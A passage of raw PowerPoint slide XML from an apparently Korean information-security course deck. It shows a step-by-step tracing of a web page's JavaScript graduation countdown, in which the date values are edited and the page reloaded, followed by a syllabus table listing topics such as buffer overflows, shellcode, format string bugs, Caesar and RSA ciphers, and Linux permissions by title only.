                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>년 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>월 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시</a:t>
            </a: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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>toString</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함수를 쓴다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웹</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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Content/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>itCS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/calendar.php-55.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 열어서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이 있는지 확인해보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>..</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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>코드를 추적 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>추측</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>진수로 표현을 하였기 때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" err="1"/>
              <a:t>초단위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t> 남은 시간임을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>다시 윗줄을 보니 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>변수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>으로 나누어 준 후 버림</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>Math.floor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>을 취한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t> 단위의 남은 시간임을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msLeft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t> 는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>.getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>에서  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1"/>
              <a:t>today.getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" err="1"/>
              <a:t>뺀것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>추측이 맞았다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>졸업 날짜는 바로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" err="1"/>
              <a:t>적혀있을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t> 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>, Date( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygYYYY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygGradMonty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygGradDay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ygGradTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>  … ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900"/>
              <a:t>로 이루어져 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ygYYYY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 를 다시 검색해보자</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코드를 찾았다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2023, 3, 5, 12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 각각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2023, 3, 7, 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>바꾸고 페이지를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>새로고침</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Inforsec</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>강의안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정보보호</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인사말</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7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>주차</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컴퓨터 언어 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>어셈블리어</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환경설치 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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이론 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>버퍼 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
                        <a:t>오버플로우란</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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시스템 해킹실습 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>버퍼 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
                        <a:t>오버플로우</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a:t>이론 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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8</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컴퓨터 도서관 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- Link Library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8-1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카이사르 고전암호 해독 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>-1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a:t>이론 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>쉘코드란</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin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8-2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카이사르 고전암호 해독 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>-2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2-3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시스템 해킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"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쉘코드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8-3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3</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9</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컴퓨터</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t> 메모장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9-1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RSA </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>이론 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
                        <a:t>힙</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
                        <a:t>오버플로우란</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin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9-2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RSA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 현대암호 제작 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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시스템 해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>실습</a:t>
                      </a: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힙</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"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오버플로우</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9-3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4</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리눅스와 친해지자</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a: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4-1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10</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고급언어의 약속 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"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포맷스트링</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10-1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리눅스와 친해지자</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a: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4-2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a:t>이론 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Format String Bug </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>란</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin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10-2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a:t>시스템 관리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>파일 접근 권한 설정</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4-3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시스템 해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>실습</a:t>
                      </a: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 FSB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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10-3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5</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&lt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>중간과제 점검 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>예시</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힌트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
